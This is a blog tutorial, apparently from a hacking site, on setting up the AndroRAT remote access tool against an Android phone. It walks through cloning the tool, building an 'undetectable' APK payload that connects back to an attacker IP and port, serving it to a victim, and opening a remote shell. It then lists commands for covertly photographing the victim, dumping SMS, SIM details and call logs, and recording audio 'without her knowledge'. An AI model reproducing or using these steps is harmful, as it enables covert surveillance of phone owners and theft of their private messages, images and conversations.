Sponsored
Andorid Hacking

Full Undetectable Android Payload (RAT) Tool

Hey guys, the article is going to be interesting because in this tutorial we will present you such a (RAT) remote administration tool with the help of which you can easily control someone else’s android smartphone. We think it does not require any other tools that’s why you can control this through third party applications such as termux etc.

Lets install this tool 🙂 !!

Installation

As we have already told you that you can control this tool from android application but in our case we we’ll choose kali linux operating system. Now first of all we will download this tool using git command from github and then go to the directory. We already have the “pip” tool installed, hence we will execute the last command to setup it successfully.

git clone https://github.com/karma9874/AndroRAT.git
cd AndroRAT/
pip install colorama

If you are stuck somewhere, you can use the help command to check for missing arguments or attributes.

python3 androRAT.py --help

Generate APK

Now we will try our first and try to create the payload using the following command. But change “-i” and “-p” according to yourself.

python3 androRAT.py --build -i 192.168.1.10 -p 4444 -o security.apk

Share

As you can see our payload is successfully created without any errors, as well as we take the help of python file service to share our payload with the victim.

python -m SimpleHTTPServer

Payload Installation

Now everything is done from the attacking side and as soon as the victim opens the payload they will look like the image below. But it’s an truely undetectable payload.

It’s time to take control of the victim smartphone and for this purposes we have to execute the following command. But change “-i” and “-p” according to you.

python3 androRAT.py --shell -i 192.168.1.10 -p 4444

Remote Shell

As you can see that we have successfully connected to the victim smartphone. But if you have no idea how to control the victim’s smartphone then use the help command.

Device Info

You can check the information of the victim android device by executing the following command.

deviceInfo

Camera List

The following command will ask you from which camera you want to take a picture from the victim’s phone.

camList
takepic 0

As you can see the picture has been successfully clicked from the victim’s phone without her knowledge.

SMS

Similarly you can get all the SMS stored on the victim’s phone by executing the following command.

getSMS inbox

The results are in front of you.

Sim Details

As a most useful feature for forensic investigator, through this facilities we can dump the complete details related to the SIM card.

getSimDetails

IP and Mac Address

As you can see that we got the IP and MAC address of the victim phone.

Audio

We started audio some time ago and now we execute the follow command to stop the audio recording.

As you can see we have listened to the victim in about 3:34 minutes.

Call Logs

This is the most useful feature of this tool, through which we can get all previous call log details from the victim phone.

Done 🙂 !! You can go to that location and open all the received files.

About the Author
Shubham Goyal Certified Ethical Hacker, information security analyst, penetration tester and researcher. Can be Contact on Linkedin.
Sponsored

View Comments

Recent Posts

Termux Cheat Sheet for Hackers

Hey Folks :) !! In this article, we present the "Termux Cheat Sheet for Hackers"…

1 month ago

Cracking the X-Factor in Cybersecurity: How Humans are Protecting the Systems?

Amid the rapid advancement of technology, the significance of human involvement in cybersecurity frequently goes…

8 months ago

Cariddi – Hidden Endpoint Finder for Bug Hunting

Hey Folks, we are back today after such a long break, but don't worry we…

2 years ago

API Security Testing 101: Know Everything About API Security Testing!

The security of your API should be one of the top priorities of companies. Without…

2 years ago

7 Best Tools for Web Penetration Testing: Comprehensive Details

Hey Folks, In today's business world, it is essential to have an online presence. However,…

2 years ago

Cyber Security Audits: Everything You Need to Know About It

Hey Folks, Is your business prepared in case of a cyber attack? Many companies don't…

2 years ago
Sponsored

This website uses cookies.